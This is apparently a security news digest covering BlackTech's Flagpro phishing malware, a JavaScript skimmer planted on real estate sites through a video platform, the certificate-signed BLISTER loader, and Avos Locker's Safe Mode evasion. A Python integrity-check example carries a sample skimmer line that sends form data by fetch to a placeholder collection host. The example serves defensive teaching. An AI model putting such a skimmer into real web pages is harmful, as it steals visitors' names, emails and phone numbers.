At a glance.
- BlackTech targets Japanese entities with new malware.
- Supply chain attack placed skimmers on real estate websites.
- Malware campaign uses valid signing certificate.
- Avos Locker uses Safe Mode to avoid detection.
BlackTech targets Japanese entities with new malware.
Researchers at NTT Security report that the China-linked threat actor BlackTech is using a new strain of malware dubbed "Flagpro" to target entities in Japan, as well as Taiwan and English-speaking countries. The malware campaign has targeted companies in the defense, media, and communications sectors.
"Flagpro is used in the initial stage of attacks to investigate the target’s environment, download a second stage malware and execute it. An attack case using Flagpro starts with a spear phishing e-mail. The message is adjusted to its target organization. It is disguised as an e-mail communication with the target’s business partner. This means the attackers probed deeper into their target before attacking.
"The attackers attach a password protected archived file (ZIP or RAR) to the email, and they write its password in the message. The archived file includes an xlsm format file and it contains a malicious macro. If a user activates the macro, malware will be dropped. They also adjust the contents of the xlsm file to the target."
Supply chain attack placed skimmers on real estate websites.
Palo Alto Networks' Unit 42 has discovered a supply chain attack that compromised more than a hundred real estate websites with a JavaScript skimmer. The attackers exploited an unnamed cloud video player platform to distribute their malicious code:
"When the cloud platform user creates a player, the user is allowed to add their own JavaScript customizations by uploading a JavaScript file to be included in their player. In this specific instance, the user uploaded a script that could be modified upstream to include malicious content.
"We infer that the attacker altered the static script at its hosted location by attaching skimmer code. Upon the next player update, the video platform re-ingested the compromised file and served it along with the impacted player.
"From the code analysis, we know the skimmer snippet is trying to gather victims’ sensitive information such as names, emails, phone numbers, and send them to a collection server, https://cdn-imgcloud[.]com/img, which is also marked as malicious in VirusTotal."
Unit 42 has since helped the cloud video platform and the real estate sites to remove the malware.
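The failure mode described above is a hosted customization script being silently re-ingested after an upstream change. As an added defensive illustration (not Unit 42's code or the video platform's), the check below pins the script's hash at upload time and refuses re-ingestion when the hosted copy no longer matches or references an origin outside an allowlist; the script contents, allowlist and collection-server domain are all constructed.

```python
import hashlib
import re

# Constructed sample: the customization script as the site owner originally
# uploaded it, and the same file after an upstream edit appended skimmer-like
# code that posts submitted form data to a collection server (hypothetical host).
ORIGINAL_JS = (
    "window.playerOpts = {autoplay: false, "
    "api: 'https://player.example-video-platform.com'};\n"
)
MODIFIED_JS = ORIGINAL_JS + (
    "document.addEventListener('submit', e => {"
    "fetch('https://collector.example.invalid/img', "
    "{method: 'POST', body: new FormData(e.target)});});\n"
)

# Hash recorded when the file was first uploaded to the player platform.
PINNED_SHA256 = hashlib.sha256(ORIGINAL_JS.encode()).hexdigest()

# Origins a player customization is expected to contact (constructed allowlist).
ALLOWED_ORIGINS = {"https://player.example-video-platform.com"}

# Scheme plus host only; path is dropped so comparison is per origin.
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+")


def check_customization(js: str, pinned_sha256: str, allowed=ALLOWED_ORIGINS) -> dict:
    """Evaluate a hosted customization script before the platform re-ingests it.

    Two independent signals: the content hash must match the pinned value, and
    every origin the script references must be on the allowlist. Either failing
    marks the file as unsafe to serve with the player.
    """
    digest = hashlib.sha256(js.encode()).hexdigest()
    unexpected = sorted({u for u in URL_RE.findall(js) if u not in allowed})
    return {
        "sha256": digest,
        "hash_matches_pin": digest == pinned_sha256,
        "unexpected_origins": unexpected,
        "safe_to_ingest": digest == pinned_sha256 and not unexpected,
    }


if __name__ == "__main__":
    print(check_customization(ORIGINAL_JS, PINNED_SHA256))
    print(check_customization(MODIFIED_JS, PINNED_SHA256))
```

The hash pin alone would already block the altered file; the origin allowlist explains why it was blocked and catches the case where the pin was never recorded.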
Malware campaign uses valid signing certificate.
Elastic Security is tracking a malware campaign that's using a valid code signing certificate to deliver a new malware loader dubbed "BLISTER":
"A key aspect of this campaign is the use of a valid code signing certificate issued by Sectigo. Adversaries can either steal legitimate code-signing certificates or purchase them from a certificate authority directly or through front companies. Executables with valid code signing certificates are often scrutinized to a lesser degree than unsigned executables. Their use allows attackers to remain under the radar and evade detection for a longer period of time. We responsibly disclosed the activity to Sectigo so they could take action and revoke the abused certificates."
Avos Locker uses Safe Mode to avoid detection.
Sophos reports that the relatively new ransomware family Avos Locker is booting infected machines in Safe Mode to avoid detection by security products. This technique isn't new, and has been used in the past by Snatch, REvil, and BlackMatter:
"The Avos Locker attackers were not only rebooting the machines into Safe Mode for the final stages of the attack; they also modified the Safe Mode boot configuration so they could install and use the commercial IT management tool AnyDesk while the Windows computers were still running in Safe Mode. Normally, third-party software would be disabled on a computer that had been rebooted into Safe Mode, but these attackers clearly intended to continue to remotely access and control the targeted machines unimpeded."